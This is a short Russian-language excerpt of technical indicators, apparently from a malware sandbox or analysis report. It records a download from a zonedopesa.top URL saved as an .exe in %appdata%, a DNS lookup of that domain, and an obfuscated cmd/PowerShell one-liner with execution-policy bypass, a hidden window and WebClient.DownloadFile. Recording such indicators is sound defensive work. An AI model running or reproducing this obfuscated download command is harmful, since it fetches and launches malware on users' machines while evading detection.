Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^weRsh^ell.^eXe^ ^-^Ex^ec^uTi^oNPOLi^Cy ^B^y^PAsS ^-nOpRof^IL^e^ -wi^nd^oW^s^TY^L^E HI^d^D^eN^ (n^EW^-O^B^jecT sYStEM.n^et.w^E^B^CLIent^).DO^wnLo^a^df^ile(^'http://www.zonedopesa....
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "p^O^weRsh^ell.^eXe^ ^-^Ex^ec^uTi^oNPOLi^Cy ^B^y^PAsS ^-nOpRof^IL^e^ -wi^nd^oW^s^TY^L^E HI^d^D^eN^ (n^EW^-O^B^jecT sYStEM.n^et.w^E^B^CLIent^).DO^wnLo^a^df^ile(^'http://www.zonedopesa....' (со скрытым окном)